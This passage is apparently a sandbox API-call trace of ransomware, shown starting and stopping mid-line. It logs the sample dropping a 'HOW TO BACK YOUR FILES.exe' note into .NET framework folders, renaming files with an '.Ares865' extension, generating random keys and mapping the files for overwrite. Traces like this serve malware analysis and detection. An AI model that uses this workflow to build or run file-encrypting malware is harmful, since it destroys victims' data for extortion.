CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.265] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList" [0124.266] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList" [0124.266] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0124.266] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\subsetlist\\how to back your files.exe"), bFailIfExists=1) returned 0 [0124.267] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0124.268] GetLastError () returned 0x0 [0124.269] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0124.269] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\SubsetList\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x522bf1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x522bf1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0124.269] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0124.269] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0124.269] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Client.xml.Ares865" | out: lpString1="Client.xml.Ares865") returned="Client.xml.Ares865" [0124.269] lstrlenW (lpString="Client.xml.Ares865") returned 18 [0124.269] lstrlenW (lpString="Ares865") returned 7 [0124.269] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0124.269] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x522bf1a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x522bf1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0124.269] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0124.269] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x522bf1a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x522bf1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0124.269] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0124.269] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0124.269] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList" [0124.270] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList" [0124.270] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0124.270] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\how to back your files.exe"), bFailIfExists=1) returned 0 [0124.271] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0124.271] GetLastError () returned 0x0 [0124.271] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0124.271] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x522e5300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x522e5300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0124.271] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0124.271] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0124.272] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="FrameworkList.xml.Ares865" | out: lpString1="FrameworkList.xml.Ares865") returned="FrameworkList.xml.Ares865" [0124.272] lstrlenW (lpString="FrameworkList.xml.Ares865") returned 25 [0124.272] lstrlenW (lpString="Ares865") returned 7 [0124.272] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0124.272] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x522bf1a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x522bf1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0124.272] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0124.272] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x522bf1a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x522bf1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0124.272] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0124.272] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0124.272] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0" [0124.272] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0" [0124.272] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0124.272] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0124.273] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0124.273] GetLastError () returned 0x0 [0124.274] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0124.274] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5230b460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5230b460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0124.274] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0124.274] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0124.274] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PresentationBuildTasks.dll" | out: lpString1="PresentationBuildTasks.dll") returned="PresentationBuildTasks.dll" [0124.274] lstrlenW (lpString="PresentationBuildTasks.dll") returned 26 [0124.274] lstrlenW (lpString="Ares865") returned 7 [0124.274] lstrcmpiW (lpString1="sks.dll", lpString2="Ares865") returned 1 [0124.274] lstrlenW (lpString=".dll") returned 4 [0124.274] lstrcmpiW (lpString1="PresentationBuildTasks.dll", lpString2=".dll") returned 1 [0124.274] lstrlenW (lpString=".lnk") returned 4 [0124.274] lstrcmpiW (lpString1="PresentationBuildTasks.dll", lpString2=".lnk") returned 1 [0124.274] lstrlenW (lpString=".ini") returned 4 [0124.274] lstrcmpiW (lpString1="PresentationBuildTasks.dll", lpString2=".ini") returned 1 [0124.274] lstrlenW (lpString=".sys") returned 4 [0124.274] lstrcmpiW (lpString1="PresentationBuildTasks.dll", lpString2=".sys") returned 1 [0124.274] lstrlenW (lpString="PresentationBuildTasks.dll") returned 26 [0124.275] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll.Ares865") returned 103 [0124.275] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationbuildtasks.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationbuildtasks.dll.ares865"), dwFlags=0x1) returned 1 [0124.276] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationbuildtasks.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.276] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=598016) returned 1 [0124.276] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.277] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.277] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.277] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x92300, lpName=0x0) returned 0x170 [0124.279] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x92300) returned 0xdd0000 [0124.303] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.303] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.303] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.312] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PresentationCore.dll" | out: lpString1="PresentationCore.dll") returned="PresentationCore.dll" [0124.312] lstrlenW (lpString="PresentationCore.dll") returned 20 [0124.312] lstrlenW (lpString="Ares865") returned 7 [0124.312] lstrcmpiW (lpString1="ore.dll", lpString2="Ares865") returned 1 [0124.312] lstrlenW (lpString=".dll") returned 4 [0124.312] lstrcmpiW (lpString1="PresentationCore.dll", lpString2=".dll") returned 1 [0124.312] lstrlenW (lpString=".lnk") returned 4 [0124.312] lstrcmpiW (lpString1="PresentationCore.dll", lpString2=".lnk") returned 1 [0124.312] lstrlenW (lpString=".ini") returned 4 [0124.312] lstrcmpiW (lpString1="PresentationCore.dll", lpString2=".ini") returned 1 [0124.312] lstrlenW (lpString=".sys") returned 4 [0124.312] lstrcmpiW (lpString1="PresentationCore.dll", lpString2=".sys") returned 1 [0124.312] lstrlenW (lpString="PresentationCore.dll") returned 20 [0124.312] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll.Ares865") returned 97 [0124.312] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationcore.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationcore.dll.ares865"), dwFlags=0x1) returned 1 [0124.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationcore.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.314] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4218880) returned 1 [0124.315] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.315] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.315] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.316] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x406300, lpName=0x0) returned 0x170 [0124.317] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x6300) returned 0x190000 [0124.428] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.429] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.429] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.439] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PresentationFramework.Aero.dll" | out: lpString1="PresentationFramework.Aero.dll") returned="PresentationFramework.Aero.dll" [0124.439] lstrlenW (lpString="PresentationFramework.Aero.dll") returned 30 [0124.439] lstrlenW (lpString="Ares865") returned 7 [0124.439] lstrcmpiW (lpString1="ero.dll", lpString2="Ares865") returned 1 [0124.439] lstrlenW (lpString=".dll") returned 4 [0124.439] lstrcmpiW (lpString1="PresentationFramework.Aero.dll", lpString2=".dll") returned 1 [0124.439] lstrlenW (lpString=".lnk") returned 4 [0124.439] lstrcmpiW (lpString1="PresentationFramework.Aero.dll", lpString2=".lnk") returned 1 [0124.439] lstrlenW (lpString=".ini") returned 4 [0124.439] lstrcmpiW (lpString1="PresentationFramework.Aero.dll", lpString2=".ini") returned 1 [0124.440] lstrlenW (lpString=".sys") returned 4 [0124.440] lstrcmpiW (lpString1="PresentationFramework.Aero.dll", lpString2=".sys") returned 1 [0124.440] lstrlenW (lpString="PresentationFramework.Aero.dll") returned 30 [0124.440] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll.Ares865") returned 107 [0124.440] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.aero.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.aero.dll.ares865"), dwFlags=0x1) returned 1 [0124.444] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.aero.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.444] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=196608) returned 1 [0124.444] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.445] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.445] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.445] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x30300, lpName=0x0) returned 0x170 [0124.447] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x30300) returned 0x420000 [0124.456] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.457] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.457] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.460] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PresentationFramework.Classic.dll" | out: lpString1="PresentationFramework.Classic.dll") returned="PresentationFramework.Classic.dll" [0124.460] lstrlenW (lpString="PresentationFramework.Classic.dll") returned 33 [0124.460] lstrlenW (lpString="Ares865") returned 7 [0124.460] lstrcmpiW (lpString1="sic.dll", lpString2="Ares865") returned 1 [0124.460] lstrlenW (lpString=".dll") returned 4 [0124.460] lstrcmpiW (lpString1="PresentationFramework.Classic.dll", lpString2=".dll") returned 1 [0124.460] lstrlenW (lpString=".lnk") returned 4 [0124.460] lstrcmpiW (lpString1="PresentationFramework.Classic.dll", lpString2=".lnk") returned 1 [0124.460] lstrlenW (lpString=".ini") returned 4 [0124.460] lstrcmpiW (lpString1="PresentationFramework.Classic.dll", lpString2=".ini") returned 1 [0124.460] lstrlenW (lpString=".sys") returned 4 [0124.460] lstrcmpiW (lpString1="PresentationFramework.Classic.dll", lpString2=".sys") returned 1 [0124.460] lstrlenW (lpString="PresentationFramework.Classic.dll") returned 33 [0124.461] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll.Ares865") returned 110 [0124.461] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.classic.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.classic.dll.ares865"), dwFlags=0x1) returned 1 [0124.463] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.classic.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.463] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=139264) returned 1 [0124.463] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.464] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.464] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.464] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x22300, lpName=0x0) returned 0x170 [0124.466] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x22300) returned 0x420000 [0124.472] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0124.473] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0124.473] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0124.475] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PresentationFramework.dll" | out: lpString1="PresentationFramework.dll") returned="PresentationFramework.dll" [0124.475] lstrlenW (lpString="PresentationFramework.dll") returned 25 [0124.475] lstrlenW (lpString="Ares865") returned 7 [0124.475] lstrcmpiW (lpString1="ork.dll", lpString2="Ares865") returned 1 [0124.475] lstrlenW (lpString=".dll") returned 4 [0124.475] lstrcmpiW (lpString1="PresentationFramework.dll", lpString2=".dll") returned 1 [0124.475] lstrlenW (lpString=".lnk") returned 4 [0124.475] lstrcmpiW (lpString1="PresentationFramework.dll", lpString2=".lnk") returned 1 [0124.475] lstrlenW (lpString=".ini") returned 4 [0124.475] lstrcmpiW (lpString1="PresentationFramework.dll", lpString2=".ini") returned 1 [0124.475] lstrlenW (lpString=".sys") returned 4 [0124.475] lstrcmpiW (lpString1="PresentationFramework.dll", lpString2=".sys") returned 1 [0124.475] lstrlenW (lpString="PresentationFramework.dll") returned 25 [0124.476] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll.Ares865") returned 102 [0124.476] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.dll.ares865"), dwFlags=0x1) returned 1 [0124.478] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0124.478] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5279744) returned 1 [0124.478] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0124.479] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0124.479] CryptReleaseContext (hProv=0x2f0518, 